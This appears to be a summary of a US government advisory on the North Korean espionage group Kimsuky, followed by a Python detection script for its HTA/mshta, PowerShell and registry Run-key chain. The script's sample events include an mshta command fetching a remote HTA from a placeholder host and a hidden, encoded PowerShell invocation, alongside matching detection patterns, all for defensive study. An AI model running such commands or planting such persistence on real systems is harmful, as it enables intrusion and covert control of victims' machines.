North Korean Advanced Persistent Threat Focus: Kimsuky
2020-10-27 • USCISA
CISA, FBI, and U.S. Cyber Command’s CNMF described Kimsuky as a North Korean APT group conducting global intelligence collection on issues of interest to Pyongyang, including Korean Peninsula policy, nuclear policy, sanctions, and targets in South Korea, Japan, and the United States. The advisory emphasizes spearphishing attachments and links, rapport-building emails, watering holes, credential theft, and malicious browser extensions as initial-access methods. Kimsuky commonly delivers BabyShark through HTA/VBS execution, uses mshta, PowerShell, Windows command shell, registry run keys for persistence, and C2 communications for host profiling and tasking. The report recommends heightened defenses against spearphishing, multi-factor authentication, and user-awareness controls for organizations in the target profile.
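The execution and persistence chain described above (script host running HTA/VBS content, spawning PowerShell or cmd.exe, and writing a registry Run key) can be checked for in endpoint telemetry. The following detection logic is an added example, not code from the advisory; the event records are constructed, with field names modelled on Sysmon process-creation and registry events, and the URL and key names are placeholders.

```python
"""Flag Kimsuky-style execution and persistence behaviour in endpoint events.

The events below are constructed for illustration (hypothetical hosts and
paths); real telemetry would be Sysmon EID 1 (process create) and EID 13
(registry value set) records with the same fields.
"""
import re

EVENTS = [  # constructed sample records, not real indicators
    {"type": "process", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://placeholder.invalid/update.hta"},
    {"type": "process", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc AAAA"},
    {"type": "registry", "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
REMOTE_OR_SCRIPT = re.compile(r"https?://|\.hta\b|\.vbs\b")
HIDDEN_OR_ENCODED = re.compile(r"-enc\b|-encodedcommand|-w hidden|-windowstyle hidden")

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return alert tags for one event; an empty list means nothing matched."""
    tags = []
    if event["type"] == "process":
        img, parent = basename(event["image"]), basename(event["parent"])
        cmd = event["cmdline"].lower()
        if img in SCRIPT_HOSTS and REMOTE_OR_SCRIPT.search(cmd):
            tags.append("script-host-remote-or-hta")      # HTA/VBS delivery stage
        if parent in SCRIPT_HOSTS and img in SHELLS:
            tags.append("script-host-spawns-shell")       # mshta/wscript -> PowerShell/cmd
        if img in SHELLS and HIDDEN_OR_ENCODED.search(cmd):
            tags.append("hidden-or-encoded-shell")
    elif event["type"] == "registry" and RUN_KEY.search(event["target"]):
        tags.append("run-key-persistence")                # Run/RunOnce key write
    return tags

def scan(events):
    """Map event index -> tags for every event that raised at least one tag."""
    hits = {}
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            hits[i] = tags
    return hits
```

Each tag on its own is noisy in a real estate; correlating the script-host, shell and Run-key tags on one host within a short window is what separates this chain from ordinary administrative use.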